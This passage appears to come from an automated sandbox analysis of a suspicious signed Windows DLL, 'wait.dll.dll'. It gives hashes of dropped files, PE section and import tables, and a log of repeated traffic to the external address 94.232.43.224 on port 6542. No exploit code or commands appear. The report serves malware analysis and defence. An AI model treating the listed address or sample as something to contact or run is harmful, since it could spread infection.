                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):98304
                                                              Entropy (8bit):0.08235737944063153
                                                              Encrypted:false
                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                              Malicious:false
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.017262956703125623
                                                              Encrypted:false
                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                              Malicious:false
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:modified
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Entropy (8bit):6.567244418107318
                                                              TrID:
                                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                              • Win64 Executable (generic) (12005/4) 10.17%
                                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                                              • DOS Executable Generic (2002/1) 1.70%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                              File name:wait.dll.dll
                                                              File size:2'151'936 bytes
                                                              MD5:50bd4ff60c931861e46c801a60f9e916
                                                              SHA1:13b14fb516fa726cc5fa9af17a2f93ff49449830
                                                              SHA256:f2170f7dc2f97434ef4514ed4272dc8792177038a085f248ba33f9259720afda
                                                              SHA512:a05c4097dca743d0d23a7e3a59fde91576e676a71b38d7daf744d6705ad19b651aac233cc53f0162ca1bbbfe2b8b0b83e58b3b7ac6e7ef66d9b3b43cbc0b48eb
                                                              SSDEEP:24576:JgWryG1z2cMbUhtEx+GRy1tWfxFDIHS4KGwt6nbmBdve1/JznfTWj+bXD:So0lolWfxeHlBwt6n+d21V7Wj+DD
                                                              TLSH:E8A58D297A9885B4D1FAC238C5678A4BF7B278168B31E3CF1256058E1F37BE1453F621
                                                              File Content Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$...............................&.......]...........................................................]...Q...............T.......T......
                                                              Icon Hash:7ae282899bbab082
                                                              Entrypoint:0x1800a7120
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x180000000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
                                                              Time Stamp:0x672BCA40 [Wed Nov 6 19:57:52 2024 UTC]
                                                              TLS Callbacks:0x800c9f80, 0x1
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:151a05f8c4e108b7847025bc50b7e6b7
                                                              Signature Valid:
                                                              Signature Issuer:
                                                              Signature Validation Error:
                                                              Error Number:
                                                              Not Before, Not After
                                                                Subject Chain
                                                                  Version:
                                                                  Thumbprint MD5:
                                                                  Thumbprint SHA-1:
                                                                  Thumbprint SHA-256:
                                                                  Serial:
                                                                  Programming Language:
                                                                  • [ C ] VS2015 UPD3.1 build 24215
                                                                  • [C++] VS2015 UPD3.1 build 24215
                                                                  • [EXP] VS2015 UPD3.1 build 24215
                                                                  • [RES] VS2015 UPD3 build 24213
                                                                  • [LNK] VS2015 UPD3.1 build 24215
                                                                  Name                                  Virtual Address  Virtual Size  Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x1ab180         0x50          .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x1ab1d0         0x118         .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x20d000         0x3e2cc       .rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x1fd000         0xdfd4        .pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x1d0200         0x4c88        .data
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x24c000         0x2cdc        .reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x16ff50         0x70          .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS             0x16ffc0         0x28          .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x140390         0x94          .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT             0x131000         0x900         .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x1aafa8         0x60          .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                  Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type  Entropy               Characteristics
                                                                  .text   0x1000           0x12fc72      0x12fe00  cfc1e87d2c63283c44e833408d29ea7f  False     0.4565355370732209    data       6.419366715731773     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata  0x131000         0x7c0fe       0x7c200   a4954081c74d000384bc2efc82edd752  False     0.3351959812437059    data       4.700482926080951     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data   0x1ae000         0x4e69c       0x11c00   fabab7297287432bf4e655ca0e30ce47  False     0.1491114656690141    data       4.898674177702867     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .pdata  0x1fd000         0xdfd4        0xe000    f990ff2d079ca6021e5f6940d93925f4  False     0.49951171875         data       6.0505498906745006    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .didat  0x20b000         0x50          0x200     e9e220e758f652c0b968858880849ef1  False     0.076171875           data       0.6238134388695525    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls    0x20c000         0x9           0x200     1f354d76203061bfdd5a53dae48d5435  False     0.033203125           data       0.020393135236084953  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc   0x20d000         0x3e2cc       0x3e400   adf6a36daa462b6fd89b22a9ce52970a  False     0.9884930346385542    data       7.99706252036296      IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc  0x24c000         0x2cdc        0x2e00    c027109eb5c0fa1a20c92ead363b39c0  False     0.26069972826086957   data       5.458036868609607     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  Name         RVA       Size     Type                                                                  Language  Country        ZLIB Complexity
                                                                  REGISTRY     0x20d200  0x268    ASCII text, with CRLF line terminators                                English   United States  0.45616883116883117
                                                                  REGISTRY     0x20d468  0x1f3    ASCII text, with very long lines (318), with CRLF line terminators    English   United States  0.42685370741482964
                                                                  REGISTRY     0x20d65c  0x2a6    ASCII text, with CRLF line terminators                                English   United States  0.4218289085545723
                                                                  RT_MANIFEST  0x20d904  0x289    ASCII text, with CRLF line terminators                                English   United States  0.5100154083204931
                                                                  RT_VERSION   0x20db90  0x394    OpenPGP Secret Key                                                    English   United States  0.43777292576419213
                                                                  RT_VXD       0x20df24  0x3d3a6  data                                                                                           0.998197695282906
                                                                  DLLImport
                                                                  RPCRT4.dllRpcRevertToSelfEx, RpcImpersonateClient
                                                                  WTSAPI32.dllWTSUnRegisterSessionNotification, WTSQuerySessionInformationW, WTSRegisterSessionNotification, WTSFreeMemory, WTSEnumerateSessionsW, WTSQueryUserToken
                                                                  SHLWAPI.dllStrStrIW, SHDeleteValueW, SHGetValueW, PathFindFileNameW, PathAddBackslashW
                                                                  USERENV.dllDestroyEnvironmentBlock, CreateEnvironmentBlock
                                                                  SETUPAPI.dllSetupDiOpenDevRegKey, CM_Get_DevNode_Status, SetupDiGetDeviceInstanceIdW, SetupDiGetDeviceRegistryPropertyW, SetupDiGetClassDevsW, SetupDiDestroyDeviceInfoList, SetupDiEnumDeviceInfo
                                                                  KERNEL32.dllGetSystemDirectoryW, GetLastError, CloseHandle, GetProcAddress, LocalFree, VerSetConditionMask, GetModuleHandleW, FreeLibrary, VerifyVersionInfoW, LoadLibraryExW, WTSGetActiveConsoleSessionId, lstrcmpiW, SizeofResource, GetFileSizeEx, EnterCriticalSection, GetCurrentProcess, ReleaseSemaphore, WriteFile, ExpandEnvironmentStringsW, LeaveCriticalSection, CreateMutexW, InitializeCriticalSectionEx, WaitForMultipleObjectsEx, WaitForSingleObject, GetCurrentThreadId, ReleaseMutex, CreateToolhelp32Snapshot, MultiByteToWideChar, Process32NextW, OutputDebugStringW, SetEvent, WaitForSingleObjectEx, QueryPerformanceFrequency, Process32FirstW, RaiseException, LoadResource, FindResourceW, DecodePointer, DeleteCriticalSection, WideCharToMultiByte, VirtualAllocExNuma, CreateSemaphoreA, CreateEventA, QueryPerformanceCounter, GetProcessTimes, HeapFree, WaitForMultipleObjects, OpenEventW, HeapSize, CreateEventW, Sleep, lstrcatW, HeapReAlloc, ResetEvent, HeapAlloc, HeapDestroy, GetProcessHeap, DuplicateHandle, GetModuleHandleA, GetCurrentThread, CreateThread, GetTickCount, DeviceIoControl, OpenMutexW, GetCurrentProcessId, ProcessIdToSessionId, GetSystemInfo, GetEnvironmentVariableA, CompareFileTime, FindClose, FindFirstFileW, GetFileAttributesW, GetFileSize, GetLogicalProcessorInformation, LoadLibraryW, FormatMessageW, GetComputerNameExW, GetVersionExW, LockResource, FindResourceExW, TerminateProcess, GetLocaleInfoW, CreateFileW, LocalAlloc, GetModuleFileNameW, GetFullPathNameW, SetLastError, GetModuleFileNameA, RtlPcToFileHeader, RtlUnwindEx, VirtualAlloc, SetStdHandle, GetFileType, GetTimeZoneInformation, ExitProcess, GetModuleHandleExW, ExitThread, FreeLibraryAndExitThread, GetStdHandle, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, GetConsoleMode, ReadConsoleW, GetConsoleCP, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, 
GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, FlushFileBuffers, WriteConsoleW, SignalObjectAndWait, SwitchToThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, InterlockedFlushSList, InterlockedPushEntrySList, AreFileApisANSI, MoveFileExW, SetFilePointerEx, SetEndOfFile, RemoveDirectoryW, DeleteFileW, CreateDirectoryW, FormatMessageA, SystemTimeToFileTime, CreateWaitableTimerA, ResumeThread, SetWaitableTimer, OpenEventA, GetCPInfo, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, TryEnterCriticalSection, GetStringTypeW, GetStartupInfoW, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, LoadLibraryExA, VirtualQuery, VirtualProtect, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes, VirtualFree, InterlockedPopEntrySList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, FindNextFileW
ADVAPI32.dll | RegQueryValueExW, RegDeleteValueW, CreateProcessAsUserW, RegOpenKeyExW, RegDeleteKeyW, RegCloseKey, RegEnumValueW, RegSetValueExW, RegEnumKeyExW, TraceMessage, RegCreateKeyExW, RegQueryInfoKeyW, ConvertStringSecurityDescriptorToSecurityDescriptorW, UnregisterTraceGuids, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegNotifyChangeKeyValue, OpenThreadToken, GetTokenInformation, GetTraceLoggerHandle, GetTraceEnableFlags, GetTraceEnableLevel, RegisterTraceGuidsW
ole32.dll | CoCreateInstanceEx, CoSetProxyBlanket, CoUninitialize, CoInitialize, CoInitializeEx, CoResumeClassObjects, CoRegisterClassObject, CoAddRefServerProcess, CoRevokeClassObject, CoCreateInstance, StringFromGUID2, CoTaskMemRealloc, CoTaskMemFree, CoTaskMemAlloc, CoInitializeSecurity
OLEAUT32.dll | VariantInit, VarUI4FromStr, SysFreeString, SysAllocString, VariantClear
bcrypt.dll | BCryptHashData, BCryptFinishHash, BCryptDestroyHash, BCryptGenRandom, BCryptCloseAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptCreateHash, BCryptVerifySignature, BCryptDestroyKey, BCryptImportKeyPair, BCryptExportKey, BCryptDecrypt, BCryptOpenAlgorithmProvider, BCryptGetProperty, BCryptEncrypt
CRYPT32.dll | CryptDecodeObjectEx, CryptStringToBinaryA, CryptImportPublicKeyInfoEx2
WS2_32.dll | socket, connect, WSAStartup, WSACleanup, WSAGetLastError, getaddrinfo, freeaddrinfo, inet_ntop, closesocket, shutdown, send, recv, ioctlsocket, WSAPoll
IPHLPAPI.DLL | GetAdaptersAddresses
Name | Ordinal | Address
Jump | 1 | 0x180043c00
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Dec 2, 2024 18:43:21.964668989 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.964730024 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.964831114 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.964873075 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.973592997 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.973654032 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.973861933 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.973906040 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.982605934 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.982666016 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:21.982753038 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:21.982795954 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.069494009 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.069608927 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.069663048 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.069708109 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.073884964 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.073950052 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.150517941 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.150568962 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.150590897 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.150628090 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.154239893 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.154288054 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.156219006 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.156261921 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.156531096 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.156570911 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.163280010 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.163330078 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.163564920 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.163602114 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.171442986 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.171494007 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.171530962 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.171576023 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.178734064 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.178785086 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.178872108 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.178910017 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.186304092 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.186348915 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.186517954 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.186573029 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.193945885 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.193995953 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.194093943 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.194145918 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.201699018 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.201744080 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.201886892 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.201930046 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.209481955 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.209608078 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.209616899 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.209666014 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.214993000 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.215040922 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.215121031 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.215163946 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.220644951 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.220705032 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.220803976 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.220896959 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.226349115 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.226396084 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.226438046 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.226490974 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.230001926 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.230071068 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.230226994 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.230279922 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.235507011 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.235610008 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.235658884 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.235765934 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.241329908 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.241466045 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.351680994 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.351736069 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.351838112 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.351888895 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.353792906 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.353847027 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.353873968 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.353919983 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.358066082 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.358146906 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.359534025 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.359664917 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.359719038 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.359734058 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.363795042 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.363863945 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.363935947 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.363986969 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.367970943 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.368048906 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.368058920 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.368104935 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.372019053 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.372070074 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.372127056 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.372209072 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.376266956 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.376367092 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.376436949 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.376504898 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.380589008 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.380656004 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.380892992 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.380955935 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.384334087 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.384381056 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.384545088 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.384594917 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.388394117 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.388446093 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.388540030 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.388603926 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.393105984 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.393151999 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.393254995 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.393306971 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.396646023 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.396706104 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.396743059 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.396802902 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.400811911 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.400866032 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.400943041 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.401020050 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.404866934 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.404943943 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.404978037 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.405024052 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.408859015 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.408910036 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.408993006 CET65424971394.232.43.224192.168.2.5
